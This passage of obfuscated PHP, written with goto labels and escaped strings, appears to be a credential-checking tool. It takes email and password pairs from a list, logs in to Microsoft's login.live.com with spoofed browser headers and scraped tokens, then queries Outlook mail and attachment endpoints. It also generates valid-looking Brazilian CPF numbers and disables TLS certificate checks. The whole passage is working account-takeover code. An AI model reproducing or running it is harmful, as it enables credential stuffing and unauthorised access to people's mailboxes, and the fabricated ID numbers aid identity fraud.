explode("\73", $encontrada); $resultado = array("\163\164\x72\x69\156\147" => "{$pieces["\x31"]}\x20\55\x20{$pieces["\62"]}\x20\x2d\40{$pieces["\63"]}\x20\x2d\x20{$pieces["\64"]}\40\55\x20{$pieces["\65"]}", "\x70\x69\145\143\145\x73\x31" => "{$pieces["\61"]}\40\x2d\x20{$pieces["\x34"]}\40\55\40{$pieces["\65"]}"); return $resultado; } goto Z85YX; xzAul: $curl = curl_init($url); goto SRLk3; dXbPu: $get_2 = curl_exec($curl); goto C0yew; ewMwF: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto rNEo1; G70vs: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\57\143\157\157\x6b\151\145\x2e\x74\170\x74"); goto n4qBF; dy0pD: function multiexplode($string) { $delimiters = array("\x7c", "\x3b", "\72", "\x2f", "\302\273", "\302\xab", "\76", "\74"); $one = str_replace($delimiters, $delimiters[0], $string); $two = explode($delimiters[0], $one); return $two; } goto oTryB; iQcLE: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto nBUWq; OArEs: $data = "\x69\61\x33\x3d\x30\46\154\157\147\x69\x6e\75{$email}\46\x6c\x6f\147\151\156\146\x6d\164\x3d{$email}\46\164\x79\x70\145\x3d\61\x31\x26\x4c\x6f\147\x69\156\x4f\x70\164\x69\x6f\x6e\x73\75\63\46\154\162\x74\x3d\46\x6c\162\x74\x50\141\162\x74\151\x74\x69\157\x6e\75\46\150\x69\x73\122\145\147\151\157\x6e\x3d\x26\150\x69\x73\x53\x63\x61\x6c\x65\x55\156\151\x74\75\x26\160\141\x73\x73\x77\x64\x3d{$senha}\46\160\x73\75\x32\x26\x70\x73\x52\116\x47\103\104\x65\x66\x61\x75\154\x74\x54\x79\x70\145\75\x26\x70\163\x52\116\107\x43\105\x6e\x74\162\157\x70\x79\x3d\x26\x70\x73\x52\116\x47\x43\x53\114\113\x3d\46\143\141\156\141\162\171\x3d\x26\143\x74\170\75\46\x68\160\147\x72\145\161\165\x65\x73\x74\x69\144\x3d\x26\x50\120\106\x54\75{$token}\46\120\120\123\130\75\120\x61\163\x73\160\x26\116\145\167\125\163\x65\x72\75\61\46\106\157\165\x6e\x64\x4d\123\x41\x73\75\x26\146\x73\160\x6f\x73\164\x3d\60\46\151\x32\61\x3d\60\x26\103\x6f\x6f\153\151\145\x44\151\163\x63\x6c\157\163\x75\162\x65\x3d\x30\x26\x49\x73\106\151\144\x6f\123\165\x70\x70\x6f\162\x74\x65\144\x3d\x31\46\x69\163\x53\x69\147\156\x75\x70\x50\x6f\163\164\x3d\x30\x26\151\x73\122\x65\x63\157\166\145\162\x79\101\x74\164\145\155\x70\164\x50\x6f\163\x74\x3d\x30\46\x69\x31\x39\75\x38\x30\x30\70"; goto GzFjD; Z85YX: function gerarCPF() { for ($i = 0; $i < 9; $i++) { $cpf[$i] = mt_rand(0, 9); } $soma = 0; for ($i = 0; $i < 9; $i++) { $soma += $cpf[$i] * (10 - $i); } $resto = $soma % 11; $cpf[9] = $resto < 2 ? 0 : 11 - $resto; $soma = 0; for ($i = 0; $i < 10; $i++) { $soma += $cpf[$i] * (11 - $i); } $resto = $soma % 11; $cpf[10] = $resto < 2 ? 0 : 11 - $resto; return implode('', $cpf); } goto Fnk0L; fs44E: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto TJbyx; iZJ8F: $token2 = trazer($Login, "\x73\x46\x54\72\x27", "\x27"); goto ohrtF; z4bbP: curl_setopt($curl, CURLOPT_HEADER, true); goto iQcLE; sP_ta: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto QX0eH; H6gE8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto LIczG; SRLk3: curl_setopt($curl, CURLOPT_URL, $url); goto UnevA; c9nb2: $pegar_tk = curl_exec($curl); goto Z6vHZ; xFE9K: $data = "\114\157\147\151\156\x4f\160\x74\x69\x6f\156\x73\75\x33\x26\164\x79\160\145\75\62\70\46\143\164\x78\75\46\150\160\x67\162\145\161\165\x65\x73\x74\151\x64\75\46\120\x50\106\x54\x3d" . urlencode($token2) . "\46\x44\x6f\x6e\164\x53\150\x6f\x77\101\147\141\x69\156\75\x74\x72\x75\145\46\x69\x31\71\75\x34\x30\x33\67"; goto EdIdG; yqhAm: if (file_exists("\x63\x6f\x6f\x6b\151\145\x2e\x74\170\x74")) { unlink("\x63\x6f\x6f\x6b\x69\145\56\164\170\x74"); } goto VO1DE; U9SxT: $headers = array("\x48\x6f\x73\164\x3a\40\x6c\157\x67\x69\x6e\56\x6c\x69\x76\x65\56\143\x6f\x6d", "\103\x61\143\x68\x65\x2d\103\x6f\156\164\162\x6f\154\72\40\155\141\170\x2d\141\147\145\x3d\60", "\125\x73\145\162\x2d\x41\147\x65\156\x74\x3a\40\x4d\157\x7a\151\x6c\x6c\141\x2f\x35\56\x30\40\x28\x57\x69\156\x64\x6f\167\163\x20\x4e\124\x20\x31\x30\x2e\x30\73\x20\127\x69\x6e\x36\x34\x3b\x20\x78\66\64\x29\x20\101\x70\x70\154\x65\x57\x65\142\113\151\x74\x2f\x35\x33\67\x2e\63\x36\x20\x28\113\x48\x54\x4d\114\x2c\40\154\151\153\x65\40\x47\145\x63\153\157\51\x20\103\x68\x72\157\155\145\57\61\61\64\x2e\x30\x2e\60\x2e\60\40\123\x61\146\141\162\151\x2f\65\x33\67\56\x33\x36", "\x41\143\143\x65\160\x74\72\40\x74\145\x78\x74\x2f\x68\x74\x6d\154\54\141\x70\160\x6c\x69\143\x61\164\151\157\x6e\x2f\170\x68\x74\x6d\154\x2b\x78\x6d\x6c\54\x61\x70\160\154\151\x63\x61\164\x69\157\156\x2f\x78\x6d\154\x3b\x71\x3d\60\56\x39\54\151\155\x61\x67\x65\57\x61\166\x69\x66\x2c\x69\155\x61\x67\x65\57\x77\x65\142\x70\54\151\155\x61\x67\x65\57\x61\160\x6e\147\x2c\x2a\57\52\73\x71\75\60\56\x38\54\x61\160\160\154\x69\x63\x61\x74\151\x6f\156\x2f\163\x69\x67\x6e\x65\x64\x2d\x65\x78\x63\150\x61\x6e\x67\x65\73\x76\75\142\63\73\161\75\x30\x2e\67", "\x43\x6f\156\x74\x65\x6e\x74\x2d\124\171\x70\x65\x3a\x20\141\160\x70\x6c\x69\143\x61\x74\x69\157\x6e\57\170\x2d\167\x77\167\x2d\x66\157\x72\155\55\165\162\x6c\x65\156\143\157\144\145\144"); goto d_PL_; nROrv: $headers = array("\110\157\163\x74\72\40\154\157\147\x69\x6e\x2e\154\x69\166\x65\56\143\157\155", "\x43\141\x63\x68\145\x2d\103\157\156\164\x72\x6f\x6c\72\x20\x6d\141\170\55\x61\147\x65\75\60", "\x55\163\x65\x72\55\x41\147\145\156\164\72\x20\115\157\x7a\151\154\x6c\141\x2f\x35\56\x30\x20\50\127\x69\x6e\x64\x6f\x77\x73\40\x4e\124\40\x31\x30\x2e\x30\x3b\40\127\x69\x6e\x36\64\x3b\x20\x78\x36\x34\51\40\101\x70\160\154\145\x57\145\x62\113\151\164\57\x35\x33\67\56\x33\x36\x20\50\113\110\124\x4d\x4c\54\x20\x6c\151\x6b\x65\x20\107\145\143\153\157\x29\x20\x43\150\x72\x6f\155\145\x2f\x31\x31\64\x2e\x30\56\60\56\60\40\123\141\146\x61\x72\x69\x2f\x35\63\67\56\x33\66", "\101\x63\143\x65\x70\164\x3a\x20\164\x65\170\x74\x2f\150\x74\x6d\154\54\x61\x70\160\x6c\x69\x63\x61\164\x69\x6f\156\x2f\170\x68\x74\x6d\x6c\x2b\x78\155\154\x2c\x61\x70\x70\154\151\143\x61\x74\x69\x6f\156\57\x78\155\x6c\73\161\x3d\x30\56\x39\x2c\x69\x6d\141\x67\145\x2f\x61\x76\x69\146\x2c\x69\x6d\141\147\x65\x2f\x77\x65\142\160\54\x69\x6d\x61\147\x65\57\x61\160\156\147\54\x2a\x2f\52\x3b\x71\x3d\60\56\70\54\x61\x70\160\x6c\151\x63\x61\164\x69\x6f\x6e\x2f\163\x69\147\156\145\144\55\145\170\143\150\141\156\x67\145\73\166\75\x62\63\x3b\x71\x3d\60\x2e\x37", "\x43\x6f\x6e\164\x65\156\x74\55\x54\171\x70\145\72\40\x61\160\x70\x6c\x69\x63\141\164\x69\x6f\x6e\57\x78\x2d\x77\167\167\x2d\146\157\x72\x6d\x2d\x75\162\154\145\156\143\157\144\x65\144"); goto mp1p9; jDUzV: curl_setopt($curl, CURLOPT_POST, true); goto fs44E; bYtwA: $email = trim(multiexplode($lista)[0]); goto o62Mj; yoGz5: curl_setopt($curl, CURLOPT_URL, $url); goto z4bbP; GzFjD: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto sYdwj; TVS4x: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\x2f\x63\x6f\157\x6b\x69\145\56\x74\x78\164"); goto oJ3mh; I46rY: $curl = curl_init($url); goto YQ9Pd; mp1p9: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto OArEs; ohrtF: $url = trazer($Login, "\x75\x72\154\x50\x6f\x73\164\72\x27", "\x27"); goto I46rY; o62Mj: $senha = trim(multiexplode($lista)[1]); goto gfabt; LMu8v: $curl = curl_init($url); goto cE9Q7; joD4m: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto c9nb2; wl0mx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\57\143\x6f\157\x6b\151\145\x2e\164\x78\164"); goto G70vs; AVWL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto tdUoT; vafsY: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto AifEm; tdUoT: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto joD4m; TJbyx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\x2f\143\157\157\153\x69\145\56\x74\170\164"); goto Sh_8C; sYdwj: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto H6gE8; nBUWq: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\57\143\157\157\x6b\x69\x65\56\x74\170\164"); goto TVS4x; HbTSX: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\57\x63\x6f\x6f\153\151\145\x2e\164\170\x74"); goto nROrv; C0yew: $url = trim(trazer($get_2, "\x6c\157\143\141\164\x69\x6f\156\x3a\x20", "\163\x65\162\166\x65\162\x3a")); goto LMu8v; EdIdG: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto wWtk3; BtuTT: if (strpos($Login2, "\160\x70\162\x69\144")) { $auth = trazer($Login2, "\x52\x70\163\103\163\x72\x66\123\x74\x61\x74\x65\75", "\46"); $pprid = trazer($Login2, "\156\141\155\145\75\42\160\x70\x72\x69\x64\42\40\x69\144\75\42\x70\x70\x72\x69\144\42\40\x76\x61\154\165\x65\x3d\42", "\42"); $NAP = trazer($Login2, "\x6e\141\x6d\x65\x3d\x22\116\101\x50\42\40\151\144\x3d\42\116\x41\x50\x22\40\x76\x61\154\165\145\75\42", "\x22"); $ANON = trazer($Login2, "\156\x61\155\145\75\42\101\116\x4f\x4e\x22\40\151\144\x3d\42\101\x4e\x4f\x4e\x22\40\x76\141\x6c\x75\145\x3d\42", "\x22"); $t = urlencode(trazer($Login2, "\156\141\x6d\x65\x3d\42\x74\42\x20\151\x64\75\42\x74\x22\40\x76\141\x6c\x75\145\75\42", "\42")); $url = "\x68\x74\164\160\x73\72\57\x2f\157\165\x74\154\157\157\153\x2e\x6c\151\166\145\56\143\157\155\57\157\x77\x61\57\77\145\x78\x63\x68\x3d\61\x26\x6e\x6c\x70\x3d\x31\46\x52\160\163\x43\x73\x72\146\123\x74\141\164\145\75{$auth}\46\167\141\x3d\167\x73\x69\147\156\x69\x6e\61\x2e\x30"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\57\x63\157\x6f\x6b\151\x65\x2e\x74\x78\164"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\57\x63\157\x6f\x6b\x69\x65\x2e\x74\x78\x74"); $headers = array("\x48\157\x73\164\72\40\157\x75\164\x6c\157\x6f\153\x2e\x6c\x69\166\145\56\143\157\x6d", "\x63\x61\143\x68\145\x2d\143\x6f\x6e\164\162\x6f\x6c\72\x20\x6d\x61\170\x2d\141\x67\x65\75\60", "\x6f\x72\x69\x67\151\156\72\x20\150\164\164\x70\163\x3a\x2f\57\x6c\157\147\x69\156\x2e\x6c\151\166\145\56\x63\x6f\x6d", "\144\156\164\72\x20\x31", "\x75\x70\x67\x72\x61\x64\145\55\x69\156\163\x65\143\x75\162\145\x2d\x72\x65\x71\x75\x65\x73\164\163\x3a\x20\x31", "\x63\x6f\156\x74\145\x6e\x74\x2d\x74\171\160\145\72\40\141\x70\x70\x6c\x69\143\141\164\151\157\156\x2f\x78\x2d\167\x77\x77\55\x66\x6f\162\155\55\x75\x72\x6c\145\156\x63\x6f\x64\x65\144", "\165\163\x65\162\x2d\x61\147\145\156\x74\72\x20\115\157\x7a\151\154\x6c\141\57\65\56\60\40\x28\127\x69\x6e\x64\157\x77\x73\x20\116\124\x20\x31\60\x2e\60\x3b\40\127\x69\x6e\66\x34\x3b\x20\x78\66\x34\51\40\101\160\x70\154\145\x57\x65\142\x4b\x69\x74\x2f\65\63\x37\x2e\63\x36\40\50\x4b\110\124\115\114\x2c\x20\x6c\x69\153\x65\x20\107\145\143\153\157\x29\x20\x43\x68\162\x6f\155\145\x2f\61\61\x34\x2e\60\x2e\60\56\60\40\x53\x61\146\141\162\x69\57\65\x33\x37\x2e\x33\66", "\141\143\143\x65\x70\x74\72\40\x74\x65\170\164\x2f\150\164\x6d\154\54\141\x70\x70\154\x69\x63\x61\164\x69\x6f\x6e\x2f\170\x68\164\155\154\x2b\x78\x6d\x6c\x2c\x61\160\160\154\x69\x63\x61\x74\x69\x6f\156\57\170\155\154\73\x71\75\x30\x2e\x39\54\151\155\141\147\x65\x2f\141\166\151\x66\x2c\x69\x6d\141\147\145\57\x77\x65\142\160\x2c\151\155\141\147\x65\57\141\160\156\147\x2c\52\57\52\73\161\75\60\56\70\54\x61\160\x70\154\151\x63\141\x74\151\157\x6e\57\x73\x69\147\x6e\x65\144\55\145\x78\x63\150\x61\156\x67\x65\x3b\x76\75\142\x33\73\161\75\x30\56\67", "\x73\x65\143\55\x66\x65\x74\143\x68\x2d\x73\151\164\145\72\40\x73\141\155\145\x2d\163\x69\x74\145", "\x73\x65\143\x2d\146\x65\164\143\150\55\x6d\157\144\x65\x3a\40\156\141\x76\x69\147\x61\164\145", "\163\145\143\55\x66\145\x74\x63\150\x2d\144\x65\x73\x74\72\x20\144\x6f\x63\x75\155\145\156\164", "\x72\145\x66\145\162\x65\x72\72\40\150\x74\x74\160\x73\x3a\x2f\57\154\157\x67\151\156\x2e\x6c\151\x76\x65\x2e\143\x6f\x6d\57", "\141\143\143\x65\160\x74\55\x6c\141\156\147\x75\141\x67\145\x3a\x20\160\164\55\102\122\54\160\x74\x3b\161\x3d\x30\x2e\71\x2c\x65\x6e\55\125\123\73\x71\75\x30\56\70\x2c\145\156\x3b\x71\x3d\x30\56\x37"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "\167\x62\x69\144\163\75\x30\46\x70\x70\162\151\x64\x3d{$pprid}\x26\x77\142\151\x64\75\115\123\x46\124\46\116\101\120\x3d{$NAP}\x26\x41\116\117\x4e\x3d{$ANON}\x26\x74\75{$t}"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $url = "\150\164\164\160\163\x3a\x2f\57\x6f\x75\x74\154\157\157\x6b\56\x6c\x69\x76\145\x2e\x63\x6f\x6d\57\x6f\167\x61\x2f\x30\x2f\x3f\145\170\143\x68\75\x31\46\156\x6c\x70\75\61\x26\x52\160\x73\x43\163\x72\x66\123\164\x61\164\x65\75{$auth}"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\x2f\x63\157\157\x6b\151\145\56\x74\170\164"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\57\143\157\x6f\153\151\x65\x2e\x74\x78\x74"); $headers = array("\110\x6f\163\164\72\x20\x6f\165\x74\x6c\157\x6f\153\x2e\x6c\151\166\x65\56\143\x6f\155", "\x63\141\143\150\x65\55\143\157\156\164\162\x6f\154\72\40\x6d\x61\x78\55\141\147\x65\75\x30", "\x64\156\x74\x3a\40\x31", "\165\x70\x67\162\x61\144\x65\55\x69\x6e\163\145\x63\x75\162\x65\x2d\x72\x65\x71\x75\145\163\x74\163\72\x20\61", "\165\163\x65\x72\x2d\141\x67\145\x6e\164\72\40\x4d\x6f\172\x69\x6c\x6c\x61\x2f\65\x2e\x30\40\50\127\151\x6e\144\x6f\167\x73\x20\116\x54\40\61\x30\56\x30\73\x20\127\x69\x6e\66\64\x3b\40\x78\x36\x34\51\x20\x41\160\x70\x6c\x65\127\145\142\113\151\x74\x2f\65\63\x37\56\63\x36\x20\x28\113\110\124\x4d\114\54\40\x6c\151\x6b\145\x20\107\145\x63\153\157\x29\40\103\150\x72\157\x6d\x65\57\x31\61\x34\x2e\60\56\x30\x2e\x30\x20\x53\141\x66\x61\x72\151\57\65\x33\67\x2e\63\66", "\141\143\x63\145\x70\x74\72\x20\x74\x65\170\x74\x2f\150\164\155\154\x2c\x61\160\x70\154\x69\x63\141\164\151\157\x6e\x2f\170\x68\164\155\154\x2b\170\155\154\54\141\x70\x70\x6c\151\x63\141\x74\x69\157\156\57\170\x6d\154\73\161\75\x30\x2e\71\x2c\151\x6d\x61\x67\x65\x2f\x61\x76\151\x66\54\151\x6d\141\x67\x65\57\x77\145\x62\x70\54\151\x6d\x61\147\x65\x2f\x61\x70\x6e\147\x2c\52\57\52\73\x71\x3d\60\x2e\x38\x2c\x61\160\160\154\151\x63\141\164\x69\x6f\x6e\57\x73\151\147\x6e\145\144\x2d\x65\170\x63\150\x61\156\x67\145\x3b\x76\x3d\x62\x33\x3b\161\75\x30\56\x37", "\x73\x65\143\55\x66\145\164\143\150\x2d\x73\x69\x74\145\x3a\x20\x73\x61\x6d\x65\x2d\x73\151\164\145", "\x73\x65\x63\55\146\x65\164\143\150\55\155\157\x64\145\72\40\x6e\x61\166\x69\147\141\x74\145", "\x73\x65\x63\55\x66\145\164\x63\150\x2d\x64\x65\x73\x74\x3a\x20\144\157\143\165\x6d\x65\156\164", "\x72\x65\x66\x65\162\x65\162\x3a\x20\x68\164\x74\x70\163\x3a\57\x2f\154\157\147\151\156\x2e\x6c\x69\166\x65\x2e\x63\157\x6d\57", "\x61\x63\x63\145\x70\164\x2d\x6c\141\x6e\147\165\141\147\x65\72\x20\160\x74\55\x42\122\x2c\160\x74\x3b\161\75\x30\x2e\71\54\145\156\55\x55\123\x3b\161\x3d\60\x2e\x38\54\x65\x6e\73\x71\75\60\56\x37"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary = trazer($resp, "\x58\x2d\x4f\x57\x41\x2d\103\101\116\101\x52\131\x3d", "\73"); $url = "\x68\x74\x74\x70\x73\x3a\x2f\57\x6f\x75\x74\154\157\x6f\153\56\154\151\166\145\x2e\x63\157\155\57\157\167\x61\57\60\x2f\x73\145\162\166\151\x63\x65\x2e\x73\x76\x63\77\x61\x63\x74\x69\x6f\x6e\x3d\x47\x65\164\x42\x70\x6f\163\123\150\x65\x6c\154\x49\x6e\146\157\x4e\x61\166\102\x61\x72\104\141\x74\141\46\141\x70\x70\x3d\115\141\x69\154\46\156\75\61"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\x2f\143\x6f\157\153\151\145\x2e\x74\170\x74"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\57\x63\x6f\157\x6b\x69\145\56\164\x78\164"); $headers = array("\x48\x6f\x73\x74\x3a\40\x6f\165\x74\x6c\157\x6f\153\56\154\151\166\x65\56\x63\157\155", "\x70\x72\145\146\x65\x72\x3a\x20\x65\x78\x63\x68\141\x6e\x67\145\56\x62\145\150\x61\166\x69\157\x72\x3d\x22\111\x6e\x63\x6c\165\x64\x65\124\150\x69\x72\x64\x50\x61\x72\x74\171\117\x6e\154\151\x6e\145\x4d\145\x65\x74\151\156\147\x50\162\157\x76\151\144\x65\162\x73\42", "\x64\156\164\x3a\x20\x31", "\x78\55\162\x65\161\x2d\x73\x6f\x75\x72\143\145\x3a\40\115\141\x69\x6c", "\x78\x2d\x6f\167\x61\x2d\143\x61\156\141\162\x79\72\40{$canary}", "\163\x65\x63\x2d\x63\150\x2d\165\141\x2d\155\157\142\x69\154\145\72\x20\x3f\x30", "\x75\163\145\162\55\141\x67\145\156\x74\72\40\115\157\x7a\151\x6c\154\x61\x2f\65\x2e\x30\40\x28\x57\x69\156\144\x6f\167\x73\40\116\x54\40\x31\60\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\40\170\x36\64\x29\40\x41\x70\x70\154\x65\x57\145\142\113\151\164\57\65\63\x37\x2e\63\x36\40\x28\113\110\x54\115\114\x2c\x20\154\x69\x6b\145\x20\107\x65\143\x6b\x6f\51\x20\103\150\162\x6f\x6d\x65\x2f\61\61\x34\x2e\60\x2e\60\x2e\x30\40\x53\141\x66\x61\x72\x69\x2f\65\x33\67\56\63\x36", "\170\55\157\x77\141\55\x75\162\x6c\160\157\163\164\144\141\x74\141\x3a\x20\45\x37\x42\45\x37\x44", "\x63\x6f\156\164\145\x6e\x74\55\x74\x79\160\145\72\40\x61\x70\160\154\151\x63\141\164\x69\x6f\x6e\57\x6a\x73\157\156\73\40\143\x68\141\162\x73\145\x74\x3d\x75\164\x66\x2d\x38", "\x61\143\x74\151\x6f\x6e\72\40\x47\x65\164\102\x70\157\x73\123\150\x65\154\x6c\111\x6e\146\x6f\116\141\166\102\141\x72\x44\x61\164\141", "\141\x63\x63\145\160\x74\72\40\52\57\52", "\157\162\x69\x67\151\x6e\72\40\150\x74\164\160\163\72\x2f\57\x6f\165\x74\154\x6f\157\x6b\56\154\151\166\145\56\x63\x6f\155", "\x73\145\143\55\146\x65\164\143\x68\x2d\163\151\164\145\x3a\x20\x73\x61\x6d\x65\x2d\157\162\x69\147\151\x6e", "\x73\x65\143\55\146\145\164\143\150\x2d\x6d\x6f\x64\x65\x3a\40\x63\157\x72\x73", "\163\145\x63\55\x66\145\x74\x63\x68\55\x64\x65\163\x74\x3a\x20\145\x6d\160\x74\x79", "\x72\x65\x66\x65\162\145\x72\x3a\x20\150\164\164\x70\163\x3a\57\x2f\x6f\165\x74\x6c\x6f\x6f\153\56\x6c\x69\x76\145\x2e\x63\157\x6d\57", "\x61\x63\x63\145\x70\x74\x2d\x6c\x61\156\147\x75\x61\147\x65\x3a\40\160\164\x2d\102\122\54\x70\x74\73\x71\x3d\60\x2e\71\54\x65\156\x2d\x55\x53\x3b\161\x3d\x30\x2e\70\x2c\x65\156\x3b\x71\75\60\56\67"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "\x2d\55\143\157\x6d\160\x72\x65\x73\163\145\144"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary2 = trazer($resp, "\130\x2d\x4f\127\x41\55\x43\x41\116\x41\x52\131\x3d", "\73"); $url = "\x68\x74\164\160\x73\x3a\57\57\157\165\x74\x6c\x6f\x6f\x6b\56\x6c\x69\x76\x65\x2e\143\x6f\155\57\157\167\141\x2f\60\57\163\x65\162\x76\x69\143\x65\x2e\163\x76\143\77\141\143\164\x69\157\x6e\75\x47\x65\164\101\x74\164\x61\x63\x68\155\x65\156\x74\x50\x72\145\166\151\145\x77\x73\46\x61\160\x70\75\115\141\x69\x6c\46\156\75\71"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\57\143\157\157\x6b\x69\x65\x2e\x74\170\x74"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\57\143\157\157\153\151\145\x2e\164\x78\164"); $headers = array("\x48\157\163\x74\x3a\40\157\165\x74\154\157\x6f\x6b\x2e\154\151\x76\145\x2e\143\x6f\x6d", "\144\156\164\x3a\x20\61", "\170\55\x72\145\x71\x2d\x73\157\x75\162\143\x65\x3a\40\115\141\151\x6c", "\170\55\x6f\x77\x61\x2d\143\x61\x6e\141\x72\171\72\40{$canary2}", "\163\x65\143\x2d\x63\x68\x2d\x75\141\x2d\x6d\x6f\142\x69\x6c\145\72\40\x3f\60", "\x75\163\x65\162\55\x61\147\x65\156\x74\72\x20\x4d\x6f\x7a\x69\154\154\141\x2f\x35\x2e\60\x20\x28\127\151\156\144\157\167\x73\40\x4e\x54\x20\x31\x30\56\60\73\40\x57\x69\156\66\64\x3b\40\170\66\64\51\40\x41\x70\160\x6c\x65\127\145\142\113\x69\x74\57\x35\63\67\x2e\x33\66\40\50\113\110\124\x4d\x4c\54\40\154\x69\x6b\x65\40\107\x65\x63\153\x6f\51\x20\103\150\162\x6f\x6d\145\x2f\61\61\64\x2e\60\56\x30\x2e\60\40\x53\x61\146\141\x72\x69\57\65\x33\x37\x2e\x33\x36", "\143\x6f\156\x74\145\x6e\164\55\164\171\x70\x65\72\x20\141\160\x70\154\x69\x63\141\164\x69\x6f\156\x2f\152\163\x6f\x6e\73\x20\x63\x68\141\x72\x73\x65\164\x3d\165\x74\146\x2d\x38", "\x61\x63\x74\x69\157\156\72\x20\107\145\x74\101\x74\164\141\143\x68\x6d\x65\156\x74\x50\162\x65\166\x69\x65\x77\x73", "\x61\x63\143\145\160\164\72\x20\x2a\57\x2a", "\x6f\162\151\147\x69\x6e\72\x20\x68\x74\164\160\x73\72\57\x2f\157\165\164\154\157\157\x6b\56\154\151\166\145\56\143\x6f\x6d", "\163\145\143\x2d\146\x65\164\x63\150\55\x73\x69\164\145\x3a\40\163\x61\x6d\145\x2d\157\162\151\147\x69\156", "\x73\145\143\x2d\x66\x65\164\143\x68\55\155\x6f\144\x65\x3a\x20\143\157\x72\163", "\x73\145\143\55\146\x65\164\x63\x68\55\x64\x65\x73\x74\x3a\x20\145\x6d\x70\x74\171", "\x72\145\x66\x65\x72\x65\162\x3a\40\x68\x74\x74\160\x73\72\x2f\x2f\x6f\165\x74\154\x6f\157\153\x2e\154\x69\166\145\x2e\x63\157\x6d\57", "\x61\x63\143\145\160\x74\55\x6c\x61\x6e\147\165\x61\147\145\x3a\40\x70\164\x2d\x42\122\54\x70\164\73\161\x3d\60\x2e\x39\54\x65\x6e\55\x55\123\73\x71\75\x30\56\x38\54\145\156\x3b\x71\75\60\x2e\67"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "\55\x2d\x63\x6f\x6d\x70\x72\145\163\163\x65\144"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary3 = trazer($resp, "\x58\x2d\x4f\x57\101\x2d\x43\101\x4e\101\x52\131\x3d", "\73"); $url = "\x68\x74\164\x70\163\72\x2f\x2f\x6f\x75\x74\x6c\157\x6f\153\56\154\x69\166\145\x2e\143\x6f\155\x2f\x6f\167\x61\x2f\60\x2f\x73\145\162\x76\x69\143\145\56\163\166\143\x3f\x61\x63\x74\151\157\156\75\107\x65\x74\101\x74\164\x61\x63\x68\x6d\145\x6e\x74\x50\x72\145\x76\x69\145\x77\163\46\141\160\x70\75\x4d\141\151\154\x26\156\75\61\x36"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\x2f\x63\x6f\x6f\153\151\x65\56\164\170\164"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\57\143\x6f\x6f\153\151\x65\56\164\x78\x74"); $headers = array("\x48\x6f\163\x74\72\x20\x6f\x75\164\x6c\157\157\x6b\56\x6c\x69\166\145\56\x63\157\155", "\x64\x6e\164\x3a\x20\61", "\x78\x2d\x72\145\x71\55\163\157\x75\162\143\145\x3a\40\x4d\x61\x69\x6c", "\170\55\x6f\x77\x61\55\x63\x61\x6e\141\162\171\x3a\40{$canary3}", "\163\145\143\x2d\x63\x68\55\x75\x61\x2d\155\x6f\142\151\154\x65\x3a\40\x3f\60", 